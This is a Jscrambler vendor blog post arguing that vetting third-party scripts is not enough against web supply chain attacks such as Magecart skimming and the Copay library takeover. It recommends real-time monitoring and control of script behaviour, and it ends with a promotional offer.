Why Script Vetting Isn't Enough to Prevent Client-Side Attacks
May 27th, 2021 | By Jscrambler | 4 min read
In the wake of several recent supply chain attacks, such as the one from SolarWinds or even the recent one that led to the Celsius Networks phishing attack many are advocating for stricter third-party control. Celsius even said that the company "will raise the bar on what we require from third parties in terms of ISO and SOC certifications."
But what does stricter third-party control really mean? How can companies get a hold of their third parties? And in the context of web supply chain attacks, is script vetting the definitive answer? Let’s find out.
To grasp the concept of third-party vetting we need to take a look at the average website. Nowadays, with the growing demand for faster product development, developers are increasingly relying on externally sourced pieces of code, especially JavaScript frameworks and libraries. This results in the average web app having more than 1000 modules, also known as code dependencies. Because each of these modules can also have dependencies of their own, each application ends up with thousands of pieces of third-party code.
Then, there’s the matter of all the additional scripts that most websites are using at runtime. Mostly every website today is using externally-sourced services like chatbots, analytics, or ads.
With such heavy usage of third parties, the attack surface increases, specifically when it comes to supply chain attacks. Because these attacks rely on the lack of visibility companies have over their code dependencies on the supply chain, they can often go unnoticed for weeks. We have seen this happen in the case of the Magecart web skimming group attack on British Airways in 2018, which went unnoticed for more than two months.
Now, the concept behind third-party script vetting, is that companies would vet each third-party script and the company that provides it to make sure that they are legitimate and secure. Vetted scripts are allowed and those that fail the vetting process are abandoned (at least while they remain insecure).
The process of vetting the script provider is typically done by looking for certifications (ISO/SOC) that attest to the company’s commitment to security. On the other hand, script vetting usually involves scanning the code for any vulnerabilities or security weaknesses that could make it easier for attackers to compromise the script.
At first glance, this may seem like a definitive answer to the problem. However, as we will see next, while this method of third-party vetting plays an important role in helping companies address web supply chain attacks, it must be coupled with additional security measures.
If we were to closely observe the different pieces of any given website over the course of a few days, we would witness hundreds of code dependencies constantly changing. Each of these frameworks and libraries receive updates, as do their respective fourth parties.
When we contrast this dynamic scenario with the concept of script vetting, we can quickly see why script vetting alone is not enough to guarantee the security of third-party scripts. The biggest problem with script vetting is that it only provides a picture of a moment in time. This means that a script that was successfully vetted and deemed secure today (because it comes from a legitimate company and doesn’t contain any known vulnerabilities) can suddenly become a security liability. If we were to trust vetting alone, we would be blindly trusting this script, completely disregarding what it is actually doing to our website. The perfect example to illustrate this is the Copay incident where a seemingly legitimate library was covertly taken over by an attacker, who made an update containing malicious code, which eventually made its way into production releases of a crypto wallet and stole some of its users’ crypto.
Another key issue of this approach is that the average website contains 35 different third-party components. Seeing as how the web supply chain is as secure as its weakest link, a robust vetting strategy would entail going through every single one of these scripts - which is an extremely complex task.
Finally, the script vetting process itself is not without flaws. While scanning for vulnerabilities is a good security practice, it does not analyze every single line of code looking for potentially malicious behaviors. A script with no known vulnerabilities can still be dangerous, for instance, if it tries to access sensitive user data.
So if just script vetting is not the definitive answer to web supply chain security, what is?
The short answer to this question is security-in-depth.
As we have seen, script vetting doesn’t address how a legitimate script can suddenly change its behavior. So, the next step for an in-depth approach is having real-time visibility of how each individual script is behaving on the website. This visibility allows companies to immediately detect any suspicious behaviors, such as a known script suddenly starting to tamper with a payment form (Magecart web skimming attack) or attempting to send data out to an unknown domain (data leakage).
Considering that Magecart web skimming attacks remain active for 22 days on average before being detected, this real-time visibility can drastically improve incident response and contain data leaks.
Still, visibility is only half of the response needed for a security-in-depth approach. The other half comes from having complete control over the behavior of each script. Effective control means being able to restrict specific allowed or disallowed behaviors in real-time, so that any attempt at malicious activity (e.g. leaking user data, showing a popup on top of the website) is blocked immediately, thwarting the attack.
To achieve this level of control companies need to look for solutions that allow establishing powerful and flexible rules that block all malicious activity on the client-side. Plus, these solutions must ensure that the normal functionality of each script is not compromised so that the user experience is unaffected.
There's no question that there's still a long road ahead before companies can fully control their web supply chain. So here's how to take the first step: request a Free Website Inventory Report and gain full visibility over your website’s scripts and their specific behaviors.
Jscrambler
The leader in client-side Web security. With Jscrambler, JavaScript applications become self-defensive and capable of detecting and blocking client-side attacks like Magecart.
View All Articles